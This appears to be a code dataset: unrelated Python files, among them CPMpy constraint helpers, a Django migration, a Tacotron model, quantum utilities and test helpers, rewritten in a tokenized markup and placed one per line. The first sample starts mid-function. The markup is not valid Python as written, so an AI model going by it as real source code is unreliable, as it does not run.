"""<if_stmt>n<l>2<block_start><return><false><block_end><if_stmt>n<eq>2<block_start><return><true><block_end><if_stmt><not>n&1<block_start><return><false><block_end><for_stmt>i range(3 1+int(math.sqrt(n)) 2)<block_start><if_stmt>n%i<eq>0<block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>primes limit<block_start>""" primes(limit) Returns the prime numbers below limit. """<line_sep>primes=[2]<line_sep>i=3<for_stmt>i range(3 limit 2)<block_start><if_stmt>is_prime(i)<block_start>primes.append(i)<block_end><block_end><return>primes<block_end><def_stmt>all_different_reif x b<block_start>""" all_different_reif(x,b) b == 1 if all values in x are different, else 0. """<line_sep>n=len(x)<line_sep>m=intvar(1 n)<line_sep><return>[nvalue(m x) (m<eq>n)<eq>(b<eq>1)]<block_end><def_stmt>all_different_reif_m model x<block_start>""" all_different_reif(x,b) b == 1 if all values in x are different, else 0. This version returns b. Note that the model is a parameter so it must be created first: x = intvar(...) b = boolvar() model = Model(...) model += [b == all_different_reif_m(model,x)] """<line_sep>n=len(x)<line_sep>m=intvar(1 n)<line_sep>b=boolvar()<line_sep>model<augadd>[nvalue(m x) (m<eq>n)<eq>(b<eq>1)]<line_sep><return>b<block_end><def_stmt>lex_chain_less x<block_start>""" lex_chain_less(x) Require that all the rows are lexicographically sorted (but not the columns as in lex2). See: http://www.emn.fr/z-info/sdemasse/gccat/Clex_chain_less.html """<line_sep>n=len(x)<line_sep>m=len(x[0])<line_sep>constraints=[]<for_stmt>i range(1 n)<block_start>constraints<augadd>[lex_less([x[i-1 j]<for>j range(m)] [x[i j]<for>j range(m)])]<block_end><return>constraints<block_end><def_stmt>soft_alldifferent x p<block_start>""" soft_alldifferent(x,p) p is the number of pairs that have the same value. See http://www.emn.fr/z-info/sdemasse/gccat/Csoft_alldifferent_ctr.html """<line_sep>n=len(x)<line_sep><return>[p<eq>sum([x[i]<eq>x[j]<for>i range(n)<for>j range(i+1 n)])]<block_end><def_stmt>among_seq low high seqlen x v<block_start>""" among_seq(low, high, seqlen, x, v) Ensures that all sequences of length SeqLen in the list X contains at least Low and atmost High occurrences of V. """<line_sep>n=len(x)<line_sep>size=n-seqlen+1<line_sep>constraints=[]<for_stmt>i range(size)<block_start>seq=[x[j]<for>j range(i i+seqlen)]<line_sep>constraints<augadd>[among_range(low high seq v)]<block_end><return>constraints<block_end><def_stmt>among_range low high x v<block_start>""" among_range(low, high, x, v) Ensures that the list x contains at least low and atmost high occurrences of v. Used by among_seq. """<line_sep>xs=intvar(0 len(x))<line_sep>vlen=len(v)<line_sep><return>[xs<eq>sum([sum([el<eq>v[i]<for>i range(vlen)])<g>0<for>el x]) xs<ge>low xs<le>high]<block_end><def_stmt>sequence x seq_length lbound ubound<block_start>""" sequence(,length,lbound,ubound) Ensures that all sums of every subsequence of length length in array x is between lbound and ubound """<line_sep>n=len(x)<line_sep>xs=intvar(lbound.lb ubound.ub)<line_sep>constraints=[]<for_stmt>i range(n-seq_length+1)<block_start>constraints<augadd>[xs<eq>sum([x[j]<for>j range(i i+seq_length)]) xs<ge>lbound xs<le>ubound]<block_end><return>constraints<block_end>
# Generated by Django 4.0.1 on 2022-03-14 10:45 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('VulnerableScan' '0004_remove_exploitregister_file_object_and_more') ]<line_sep>operations=[migrations.AddField(model_name='vulnerablescantasks' name='notice' field=models.BooleanField(db_column='notice' default=<false> verbose_name='是否钉钉通知') ) ]<block_end>
<import_stmt>signal subprocess sys<line_sep># On Linux this causes os.waitpid to fail with OSError as the OS has already # reaped our child process. The wait() passing the OSError on to the caller # and causing us to exit with an error is what we are testing against. signal.signal(signal.SIGCHLD signal.SIG_IGN)<line_sep>subprocess.Popen([sys.executable '-c' 'print("albatross")']).wait()<line_sep>
<import_stmt>argparse<import_stmt>logging<import_from_stmt>dvc.command completion<import_from_stmt>dvc.command.base CmdBase append_doc_link<import_from_stmt>dvc.exceptions DvcException<line_sep>logger=logging.getLogger(__name__)<class_stmt>CmdRemove(CmdBase)<block_start><def_stmt>run self<block_start><for_stmt>target self.args.targets<block_start><try_stmt><block_start>self.repo.remove(target outs=self.args.outs)<block_end><except_stmt>DvcException<block_start>logger.exception("")<line_sep><return>1<block_end><block_end><return>0<block_end><block_end><def_stmt>add_parser subparsers parent_parser<block_start>REMOVE_HELP=("Remove stages from dvc.yaml and/or"<concat>" stop tracking files or directories.")<line_sep>remove_parser=subparsers.add_parser("remove" parents=[parent_parser] description=append_doc_link(REMOVE_HELP "remove") help=REMOVE_HELP formatter_class=argparse.RawDescriptionHelpFormatter )<line_sep>remove_parser.add_argument("--outs" action="store_true" default=<false> help="Remove outputs as well." )<line_sep>remove_parser.add_argument("targets" nargs="+" help=".dvc files or stages from dvc.yaml to remove." ).complete=completion.DVC_FILE<line_sep>remove_parser.set_defaults(func=CmdRemove)<block_end>
<import_from_stmt>pathlib Path<import_from_stmt>typing Union Dict Any Tuple<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_from_stmt>models.common_layers CBHG<import_from_stmt>utils.text.symbols phonemes<class_stmt>Encoder(nn.Module)<block_start><def_stmt>__init__ self embed_dims num_chars cbhg_channels K num_highways dropout<block_start>super().__init__()<line_sep>self.embedding=nn.Embedding(num_chars embed_dims)<line_sep>self.pre_net=PreNet(embed_dims)<line_sep>self.cbhg=CBHG(K=K in_channels=cbhg_channels channels=cbhg_channels proj_channels=[cbhg_channels cbhg_channels] num_highways=num_highways)<block_end><def_stmt>forward self x<block_start>x=self.embedding(x)<line_sep>x=self.pre_net(x)<line_sep>x.transpose_(1 2)<line_sep>x=self.cbhg(x)<line_sep><return>x<block_end><block_end><class_stmt>PreNet(nn.Module)<block_start><def_stmt>__init__ self in_dims fc1_dims=256 fc2_dims=128 dropout=0.5<block_start>super().__init__()<line_sep>self.fc1=nn.Linear(in_dims fc1_dims)<line_sep>self.fc2=nn.Linear(fc1_dims fc2_dims)<line_sep>self.p=dropout<block_end><def_stmt>forward self x<block_start>x=self.fc1(x)<line_sep>x=F.relu(x)<line_sep>x=F.dropout(x self.p training=self.training)<line_sep>x=self.fc2(x)<line_sep>x=F.relu(x)<line_sep>x=F.dropout(x self.p training=self.training)<line_sep><return>x<block_end><block_end><class_stmt>Attention(nn.Module)<block_start><def_stmt>__init__ self attn_dims<block_start>super().__init__()<line_sep>self.W=nn.Linear(attn_dims attn_dims bias=<false>)<line_sep>self.v=nn.Linear(attn_dims 1 bias=<false>)<block_end><def_stmt>forward self encoder_seq_proj query t# print(encoder_seq_proj.shape) # Transform the query vector <block_start>query_proj=self.W(query).unsqueeze(1)<line_sep># Compute the scores u=self.v(torch.tanh(encoder_seq_proj+query_proj))<line_sep>scores=F.softmax(u dim=1)<line_sep><return>scores.transpose(1 2)<block_end><block_end><class_stmt>LSA(nn.Module)<block_start><def_stmt>__init__ self attn_dim kernel_size=31 filters=32<block_start>super().__init__()<line_sep>self.conv=nn.Conv1d(2 filters padding=(kernel_size-1)<floordiv>2 kernel_size=kernel_size bias=<false>)<line_sep>self.L=nn.Linear(filters attn_dim bias=<true>)<line_sep>self.W=nn.Linear(attn_dim attn_dim bias=<true>)<line_sep>self.v=nn.Linear(attn_dim 1 bias=<false>)<line_sep>self.cumulative=<none><line_sep>self.attention=<none><block_end><def_stmt>init_attention self encoder_seq_proj<block_start>device=next(self.parameters()).device# use same device as parameters b,t,c=encoder_seq_proj.size()<line_sep>self.cumulative=torch.zeros(b t device=device)<line_sep>self.attention=torch.zeros(b t device=device)<block_end><def_stmt>forward self encoder_seq_proj query t<block_start><if_stmt>t<eq>0<block_start>self.init_attention(encoder_seq_proj)<block_end>processed_query=self.W(query).unsqueeze(1)<line_sep>location=torch.cat([self.cumulative.unsqueeze(1) self.attention.unsqueeze(1)] dim=1)<line_sep>processed_loc=self.L(self.conv(location).transpose(1 2))<line_sep>u=self.v(torch.tanh(processed_query+encoder_seq_proj+processed_loc))<line_sep>u=u.squeeze(-1)<line_sep># Smooth Attention #scores = torch.sigmoid(u) / torch.sigmoid(u).sum(dim=1, keepdim=True) scores=F.softmax(u dim=1)<line_sep>self.attention=scores<line_sep>self.cumulative<augadd>self.attention<line_sep><return>scores.unsqueeze(-1).transpose(1 2)<block_end><block_end><class_stmt>Decoder(nn.Module)# Class variable because its value doesn't change between classes # yet ought to be scoped by class because its a property of a Decoder <block_start>max_r=20<def_stmt>__init__ self n_mels decoder_dims lstm_dims<block_start>super().__init__()<line_sep>self.register_buffer('r' torch.tensor(1 dtype=torch.int))<line_sep>self.n_mels=n_mels<line_sep>self.prenet=PreNet(n_mels)<line_sep>self.attn_net=LSA(decoder_dims)<line_sep>self.attn_rnn=nn.GRUCell(decoder_dims+decoder_dims<floordiv>2 decoder_dims)<line_sep>self.rnn_input=nn.Linear(2<times>decoder_dims lstm_dims)<line_sep>self.res_rnn1=nn.LSTMCell(lstm_dims lstm_dims)<line_sep>self.res_rnn2=nn.LSTMCell(lstm_dims lstm_dims)<line_sep>self.mel_proj=nn.Linear(lstm_dims n_mels<times>self.max_r bias=<false>)<block_end><def_stmt>zoneout self prev current p=0.1<block_start>device=next(self.parameters()).device# Use same device as parameters mask=torch.zeros(prev.size() device=device).bernoulli_(p)<line_sep><return>prev<times>mask+current<times>(1-mask)<block_end><def_stmt>forward self encoder_seq encoder_seq_proj prenet_in hidden_states cell_states context_vec t# Need this for reshaping mels <block_start>batch_size=encoder_seq.size(0)<line_sep># Unpack the hidden and cell states attn_hidden,rnn1_hidden,rnn2_hidden=hidden_states<line_sep>rnn1_cell,rnn2_cell=cell_states<line_sep># PreNet for the Attention RNN prenet_out=self.prenet(prenet_in)<line_sep># Compute the Attention RNN hidden state attn_rnn_in=torch.cat([context_vec prenet_out] dim=-1)<line_sep>attn_hidden=self.attn_rnn(attn_rnn_in.squeeze(1) attn_hidden)<line_sep># Compute the attention scores scores=self.attn_net(encoder_seq_proj attn_hidden t)<line_sep># Dot product to create the context vector context_vec=scores@encoder_seq<line_sep>context_vec=context_vec.squeeze(1)<line_sep># Concat Attention RNN output w. Context Vector & project x=torch.cat([context_vec attn_hidden] dim=1)<line_sep>x=self.rnn_input(x)<line_sep># Compute first Residual RNN rnn1_hidden_next,rnn1_cell=self.res_rnn1(x (rnn1_hidden rnn1_cell))<if_stmt>self.training<block_start>rnn1_hidden=self.zoneout(rnn1_hidden rnn1_hidden_next)<block_end><else_stmt><block_start>rnn1_hidden=rnn1_hidden_next<block_end>x=x+rnn1_hidden<line_sep># Compute second Residual RNN rnn2_hidden_next,rnn2_cell=self.res_rnn2(x (rnn2_hidden rnn2_cell))<if_stmt>self.training<block_start>rnn2_hidden=self.zoneout(rnn2_hidden rnn2_hidden_next)<block_end><else_stmt><block_start>rnn2_hidden=rnn2_hidden_next<block_end>x=x+rnn2_hidden<line_sep># Project Mels mels=self.mel_proj(x)<line_sep>mels=mels.view(batch_size self.n_mels self.max_r)[: : :self.r]<line_sep>hidden_states=(attn_hidden rnn1_hidden rnn2_hidden)<line_sep>cell_states=(rnn1_cell rnn2_cell)<line_sep><return>mels scores hidden_states cell_states context_vec<block_end><block_end><class_stmt>Tacotron(nn.Module)<block_start><def_stmt>__init__ self embed_dims:int num_chars:int encoder_dims:int decoder_dims:int n_mels:int postnet_dims:int encoder_k:int lstm_dims:int postnet_k:int num_highways:int dropout:float stop_threshold:float<arrow><none><block_start>super().__init__()<line_sep>self.n_mels=n_mels<line_sep>self.lstm_dims=lstm_dims<line_sep>self.decoder_dims=decoder_dims<line_sep>self.encoder=Encoder(embed_dims num_chars encoder_dims encoder_k num_highways dropout)<line_sep>self.encoder_proj=nn.Linear(decoder_dims decoder_dims bias=<false>)<line_sep>self.decoder=Decoder(n_mels decoder_dims lstm_dims)<line_sep>self.postnet=CBHG(postnet_k n_mels postnet_dims [256 80] num_highways)<line_sep>self.post_proj=nn.Linear(postnet_dims<times>2 n_mels bias=<false>)<line_sep>self.init_model()<line_sep>self.register_buffer('step' torch.zeros(1 dtype=torch.long))<line_sep>self.register_buffer('stop_threshold' torch.tensor(stop_threshold dtype=torch.float32))<block_end>@property<def_stmt>r self<arrow>int<block_start><return>self.decoder.r.item()<block_end>@r.setter<def_stmt>r self value:int<arrow><none><block_start>self.decoder.r=self.decoder.r.new_tensor(value requires_grad=<false>)<block_end><def_stmt>forward self x:torch.tensor m:torch.tensor<arrow>torch.tensor<block_start>device=next(self.parameters()).device# use same device as parameters <if_stmt>self.training<block_start>self.step<augadd>1<block_end>batch_size,_,steps=m.size()<line_sep># Initialise all hidden states and pack into tuple attn_hidden=torch.zeros(batch_size self.decoder_dims device=device)<line_sep>rnn1_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>hidden_states=(attn_hidden rnn1_hidden rnn2_hidden)<line_sep># Initialise all lstm cell states and pack into tuple rnn1_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>cell_states=(rnn1_cell rnn2_cell)<line_sep># <GO> Frame for start of decoder loop go_frame=torch.zeros(batch_size self.n_mels device=device)<line_sep># Need an initial context vector context_vec=torch.zeros(batch_size self.decoder_dims device=device)<line_sep># Project the encoder outputs to avoid # unnecessary matmuls in the decoder loop encoder_seq=self.encoder(x)<line_sep>encoder_seq_proj=self.encoder_proj(encoder_seq)<line_sep># Need a couple of lists for outputs mel_outputs,attn_scores=[] []<line_sep># Run the decoder loop <for_stmt>t range(0 steps self.r)<block_start>prenet_in=m[: : t-1]<if>t<g>0<else>go_frame<line_sep>mel_frames,scores,hidden_states,cell_states,context_vec=self.decoder(encoder_seq encoder_seq_proj prenet_in hidden_states cell_states context_vec t)<line_sep>mel_outputs.append(mel_frames)<line_sep>attn_scores.append(scores)<block_end># Concat the mel outputs into sequence mel_outputs=torch.cat(mel_outputs dim=2)<line_sep># Post-Process for Linear Spectrograms postnet_out=self.postnet(mel_outputs)<line_sep>linear=self.post_proj(postnet_out)<line_sep>linear=linear.transpose(1 2)<line_sep># For easy visualisation attn_scores=torch.cat(attn_scores 1)<line_sep># attn_scores = attn_scores.cpu().data.numpy() <return>mel_outputs linear attn_scores<block_end><def_stmt>generate self x:torch.tensor steps=2000<arrow>Tuple[torch.tensor torch.tensor torch.tensor]<block_start>self.eval()<line_sep>device=next(self.parameters()).device# use same device as parameters batch_size=1<line_sep># Need to initialise all hidden states and pack into tuple for tidyness attn_hidden=torch.zeros(batch_size self.decoder_dims device=device)<line_sep>rnn1_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>hidden_states=(attn_hidden rnn1_hidden rnn2_hidden)<line_sep># Need to initialise all lstm cell states and pack into tuple for tidyness rnn1_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>cell_states=(rnn1_cell rnn2_cell)<line_sep># Need a <GO> Frame for start of decoder loop go_frame=torch.zeros(batch_size self.n_mels device=device)<line_sep># Need an initial context vector context_vec=torch.zeros(batch_size self.decoder_dims device=device)<line_sep># Project the encoder outputs to avoid # unnecessary matmuls in the decoder loop encoder_seq=self.encoder(x)<line_sep>encoder_seq_proj=self.encoder_proj(encoder_seq)<line_sep># Need a couple of lists for outputs mel_outputs,attn_scores=[] []<line_sep># Run the decoder loop <for_stmt>t range(0 steps self.r)<block_start>prenet_in=mel_outputs[-1][: : -1]<if>t<g>0<else>go_frame<line_sep>mel_frames,scores,hidden_states,cell_states,context_vec=self.decoder(encoder_seq encoder_seq_proj prenet_in hidden_states cell_states context_vec t)<line_sep>mel_outputs.append(mel_frames)<line_sep>attn_scores.append(scores)<line_sep># Stop the loop if silent frames present <if_stmt>(mel_frames<l>self.stop_threshold).all()<and>t<g>10<block_start><break><block_end><block_end># Concat the mel outputs into sequence mel_outputs=torch.cat(mel_outputs dim=2)<line_sep># Post-Process for Linear Spectrograms postnet_out=self.postnet(mel_outputs)<line_sep>linear=self.post_proj(postnet_out)<line_sep>linear=linear.transpose(1 2)[0].cpu().data.numpy()<line_sep>mel_outputs=mel_outputs[0].cpu().data.numpy()<line_sep># For easy visualisation attn_scores=torch.cat(attn_scores 1)<line_sep>attn_scores=attn_scores.cpu().data.numpy()[0]<line_sep>self.train()<line_sep><return>mel_outputs linear attn_scores<block_end><def_stmt>init_model self<block_start><for_stmt>p self.parameters()<block_start><if_stmt>p.dim()<g>1<block_start>nn.init.xavier_uniform_(p)<block_end><block_end><block_end><def_stmt>get_step self<block_start><return>self.step.data.item()<block_end><def_stmt>reset_step self# assignment to parameters or buffers is overloaded, updates internal dict entry <block_start>self.step=self.step.data.new_tensor(1)<block_end>@classmethod<def_stmt>from_config cls config:Dict[str Any]<arrow>'Tacotron'<block_start>model_config=config['tacotron']['model']<line_sep>model_config['num_chars']=len(phonemes)<line_sep>model_config['n_mels']=config['dsp']['num_mels']<line_sep><return>Tacotron(**model_config)<block_end>@classmethod<def_stmt>from_checkpoint cls path:Union[Path str]<arrow>'Tacotron'<block_start>checkpoint=torch.load(path map_location=torch.device('cpu'))<line_sep>model=Tacotron.from_config(checkpoint['config'])<line_sep>model.load_state_dict(checkpoint['model'])<line_sep><return>model<block_end><block_end>
<import_stmt>itertools<import_stmt>numpy<as>np<import_stmt>scipy<import_stmt>socket<import_stmt>subprocess<import_stmt>time<def_stmt>get_free_port <block_start>sock=socket.socket()<line_sep>sock.bind(('' 0))<line_sep>port=sock.getsockname()[1]<line_sep>sock.close()<line_sep><return>port<block_end><def_stmt>init_qvm_and_quilc qvm_executable="qvm" quilc_executable="quilc"<block_start>qvm_port=get_free_port()<line_sep>quilc_port=get_free_port()<line_sep>qvm_server=subprocess.Popen([qvm_executable "-S" "-p" str(qvm_port)])<line_sep>quilc_server=subprocess.Popen([quilc_executable "-R" "-p" str(quilc_port)])<line_sep>fc=ForestConnection(sync_endpoint='http://127.0.0.1:'+str(qvm_port) compiler_endpoint='tcp://127.0.0.1:'+str(quilc_port))<line_sep>time.sleep(5)<line_sep><return>qvm_server quilc_server fc<block_end><def_stmt>get_amplitudes circuit<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>backend=Aer.get_backend('statevector_simulator')<line_sep>job=execute(circuit backend)<line_sep>amplitudes=job.result().get_statevector(circuit)<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>wf_sim=WavefunctionSimulator(connection=fc)<line_sep>wavefunction=wf_sim.wavefunction(circuit)<line_sep>amplitudes=wavefunction.amplitudes<block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>amplitudes<block_end><def_stmt>get_counts circuit num_shots=100<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>backend=Aer.get_backend('qasm_simulator')<line_sep>job=execute(circuit backend shots=num_shots)<line_sep>result=job.result()<line_sep>counts=result.get_counts(circuit)<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>n_qubits=len(circuit.get_qubits())<line_sep>circuit.wrap_in_numshots_loop(num_shots)<line_sep>qc=get_qc(str(n_qubits)+'q-qvm' connection=fc)<line_sep>executable=qc.compile(circuit)<line_sep>result=qc.run(executable)<line_sep>classical_bits=get_classical_bits(circuit)<line_sep>counts={}<for_stmt>bitstring itertools.product(*[{1 0}<for>_ range(classical_bits)])<block_start>key="".join(str(i)<for>i bitstring)<line_sep>value=sum([tuple(d.tolist())<eq>bitstring<for>d result])<line_sep>counts[key]=value<block_end><block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>counts<block_end><def_stmt>get_single_measurement_counts circuit num_shots=100<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>backend=Aer.get_backend('qasm_simulator')<line_sep>job=execute(circuit backend shots=num_shots)<line_sep>result=job.result()<line_sep>counts=result.get_counts(circuit)<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>n_qubits=len(circuit.get_qubits())<line_sep>circuit.wrap_in_numshots_loop(num_shots)<line_sep>qc=get_qc(str(n_qubits)+'q-qvm' connection=fc)<line_sep>executable=qc.compile(circuit)<line_sep>result=qc.run(executable)<line_sep>classical_bits=get_classical_bits(circuit)<line_sep>counts={}<for_stmt>bitstring itertools.product(*[{1 0}<for>_ range(classical_bits)])<block_start>key="".join(str(i)<for>i bitstring)<line_sep>counts[key]=0<block_end>counts["0"<times>classical_bits]=(result<eq>0).sum()<line_sep>counts["0"<times>(classical_bits-1)+"1"]=(result<eq>1).sum()<block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>counts<block_end><def_stmt>get_classical_bits circuit<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>classical_bits=circuit.cregs[0].size<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start><for_stmt>instruction circuit.instructions<block_start><if_stmt>isinstance(instruction pyquil.quilbase.Declare)<block_start>classical_bits=instruction.memory_size<line_sep><break><block_end><block_end><block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>classical_bits<block_end><def_stmt>get_circuit_length circuit<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>program_length=sum(circuit.count_ops().values())<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>program_length=len(circuit.instructions)<block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>program_length<block_end><if_stmt>__name__<eq>"__main__"<block_start><try_stmt><block_start><import_stmt>grove<import_stmt>pyquil<import_from_stmt>grove.pyvqe vqe<import_from_stmt>pyquil Program get_qc<import_from_stmt>pyquil.paulis PauliSum PauliTerm exponential_map sZ<import_from_stmt>pyquil.api WavefunctionSimulator ForestConnection<import_from_stmt>pyquil.gates *<try_stmt><block_start>qvm_server,quilc_server,fc=init_qvm_and_quilc()<line_sep>is_forest=<true><block_end><except_stmt>FileNotFoundError<block_start><try_stmt><block_start>prefix="/home/local/bin/"<line_sep>qvm_server,quilc_server,fc=init_qvm_and_quilc(prefix+"qvm" prefix+"quilc")<line_sep>is_forest=<true><block_end><except_stmt>FileNotFoundError<block_start>is_forest=<false><block_end><block_end><block_end><except_stmt>ImportError<block_start>is_forest=<false><block_end><try_stmt><block_start><import_stmt>qiskit<import_stmt>qiskit.aqua<import_from_stmt>qiskit QuantumCircuit ClassicalRegister QuantumRegister<import_from_stmt>qiskit execute<try_stmt><block_start><import_from_stmt>qiskit Aer<block_end><except_stmt>ImportError<block_start><import_from_stmt>qiskit BasicAer<as>Aer<block_end><import_from_stmt>qiskit.quantum_info Pauli<import_from_stmt>qiskit.aqua.operators *<line_sep>is_qiskit=<true><block_end><except_stmt>ImportError<block_start>is_qiskit=<false><block_end><try_stmt><block_start><import_stmt>dimod<import_stmt>dwave_networkx<import_stmt>minorminer<line_sep>is_dwave=<true><block_end><except_stmt>ImportError<block_start>is_dwave=<false><block_end><if_stmt><not>(is_qiskit<or>is_forest)<block_start><raise>RuntimeError("No quantum computing framework available!")<block_end><if_stmt><not>is_dwave<block_start><raise>RuntimeError("D-Wave Ocean is not available!")<block_end>print("Available frameworks:")<if_stmt>is_forest<block_start>print("Forest SDK")<block_end><if_stmt>is_qiskit<block_start>print("Qiskit")<block_end><if_stmt>is_dwave<block_start>print("D-Wave Ocean")<block_end><block_end>
<import_stmt>time<import_from_stmt>functools partial<import_stmt>torch<def_stmt>timer fxn max_time=5<block_start>N=0<line_sep>total_time=0<line_sep>fxn()<while_stmt>total_time<l>max_time<block_start>start=time.perf_counter()<line_sep>fxn()<line_sep>total_time<augadd>time.perf_counter()-start<line_sep>N<augadd>1<block_end><return>total_time/N<block_end><def_stmt>task A target<block_start>result=0<line_sep>i=0<line_sep>N=0<while_stmt>result<l>target<block_start>r=A[i]<line_sep>result<augadd>r<line_sep>i=A[i]<line_sep>N<augadd>1<block_end><return>N<block_end><if_stmt>__name__<eq>"__main__"<block_start>N=1000<line_sep>print(f"Testing with array of length {N}")<line_sep>A_py=(torch.rand(N)<times>N).type(torch.int).to("cuda:0")<line_sep>A_np=A_py.cpu().numpy()<line_sep>t_py=timer(partial(task A_py 500))<line_sep>t_np=timer(partial(task A_np 500))<line_sep>print(f"PyTorch took: {t_py:0.3e}s")<line_sep>print(f"Numpy took: {t_np:0.3e}s")<line_sep>print(f"Numpy is {100-t_np/t_py<times>100:0.2f}% faster")<block_end>
# # tests/utils # """ Useful functions for all tests """<import_stmt>asyncio<import_stmt>pytest<import_from_stmt>growler.aio.http_protocol GrowlerHTTPProtocol<import_stmt>growler<def_stmt>random_port <block_start><import_from_stmt>random randint<line_sep><return>randint(1024 2<power>16)<block_end>@asyncio.coroutine<def_stmt>setup_test_server unused_tcp_port event_loop<block_start>""" Sets up a GrowlerProtocol server for testing """<line_sep># proto = growler.protocol.GrowlerProtocol proto=TestProtocol<line_sep>server=<yield><from>event_loop.create_server(proto '127.0.0.1' unused_tcp_port)<line_sep><return>server unused_tcp_port<block_end>@asyncio.coroutine<def_stmt>setup_http_server loop port<block_start>""" Sets up a GrowlerHTTPProtocol server for testing """<line_sep># proto = growler.protocol.GrowlerHTTPProtocol app=growler.App()<def_stmt>proto <block_start><return>GrowlerHTTPProtocol(app)<block_end><return>(<yield><from>loop.create_server(proto '127.0.0.1' port))<block_end><def_stmt>teardown_server server loop=asyncio.get_event_loop()<block_start>""" 'Generic' tear down a server and wait on the loop for everything to close. """<line_sep>server.close()<line_sep>loop.run_until_complete(server.wait_closed())<block_end>
<class_stmt>ObjectMaterialSource(Enum IComparable IFormattable IConvertible)<block_start>""" Defines enumerated values for the source of material of single objects. enum ObjectMaterialSource,values: MaterialFromLayer (0),MaterialFromObject (1),MaterialFromParent (3) """<def_stmt>__eq__ self *args<block_start>""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """<line_sep><pass><block_end><def_stmt>__format__ self *args<block_start>""" __format__(formattable: IFormattable,format: str) -> str """<line_sep><pass><block_end><def_stmt>__ge__ self *args<block_start><pass><block_end><def_stmt>__gt__ self *args<block_start><pass><block_end><def_stmt>__init__ self *args<block_start>""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """<line_sep><pass><block_end><def_stmt>__le__ self *args<block_start><pass><block_end><def_stmt>__lt__ self *args<block_start><pass><block_end><def_stmt>__ne__ self *args<block_start><pass><block_end><def_stmt>__reduce_ex__ self *args<block_start><pass><block_end><def_stmt>__str__ self *args<block_start><pass><block_end>MaterialFromLayer=<none><line_sep>MaterialFromObject=<none><line_sep>MaterialFromParent=<none><line_sep>value__=<none><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>RecoLocalMuon.GEMRecHit.gemRecHits_cfi *<import_from_stmt>RecoLocalMuon.GEMSegment.gemSegments_cfi *<line_sep>gemLocalRecoTask=cms.Task(gemRecHits gemSegments)<line_sep>gemLocalReco=cms.Sequence(gemLocalRecoTask)<line_sep>
""" Filename: cartesian.py Authors: <NAME> Implements cartesian products and regular cartesian grids. """<import_stmt>numpy<import_from_stmt>numba njit<def_stmt>cartesian nodes order="C"<block_start>"""Cartesian product of a list of arrays Parameters: ----------- nodes: (list of 1d-arrays) order: ('C' or 'F') order in which the product is enumerated Returns: -------- out: (2d-array) each line corresponds to one point of the product space """<line_sep>nodes=[numpy.array(e)<for>e nodes]<line_sep>shapes=[e.shape[0]<for>e nodes]<line_sep>n=len(nodes)<line_sep>l=numpy.prod(shapes)<line_sep>out=numpy.zeros((l n))<if_stmt>order<eq>"C"<block_start>repetitions=numpy.cumprod([1]+shapes[:-1])<block_end><else_stmt><block_start>shapes.reverse()<line_sep>sh=[1]+shapes[:-1]<line_sep>repetitions=numpy.cumprod(sh)<line_sep>repetitions=repetitions.tolist()<line_sep>repetitions.reverse()<block_end><for_stmt>i range(n)<block_start>_repeat_1d(nodes[i] repetitions[i] out[: i])<block_end><return>out<block_end><def_stmt>mlinspace a b nums order="C"<block_start>"""Constructs a regular cartesian grid Parameters: ----------- a: (1d-array) lower bounds in each dimension b: (1d-array) upper bounds in each dimension nums: (1d-array) number of nodes along each dimension order: ('C' or 'F') order in which the product is enumerated Returns: -------- out: (2d-array) each line corresponds to one point of the product space """<line_sep>a=numpy.array(a dtype="float64")<line_sep>b=numpy.array(b dtype="float64")<line_sep>nums=numpy.array(nums dtype="int64")<line_sep>nodes=[numpy.linspace(a[i] b[i] nums[i])<for>i range(len(nums))]<line_sep><return>cartesian(nodes order=order)<block_end>@njit(cache=<true>)<def_stmt>_repeat_1d x K out<block_start>"""Repeats each element of a vector many times and repeats the whole result many times Parameters ---------- x: (1d array) vector to be repeated K: (int) number of times each element of x is repeated (inner iterations) out: (1d array) placeholder for the result Returns ------- None """<line_sep>N=x.shape[0]<line_sep>L=out.shape[0]<floordiv>(K<times>N)# number of outer iterations # K # number of inner iterations # the result out should enumerate in C-order the elements # of a 3-dimensional array T of dimensions (K,N,L) # such that for all k,n,l, we have T[k,n,l] == x[n] <for_stmt>n range(N)<block_start>val=x[n]<for_stmt>k range(K)<block_start><for_stmt>l range(L)<block_start>ind=k<times>N<times>L+n<times>L+l<line_sep>out[ind]=val<block_end><block_end><block_end><block_end>
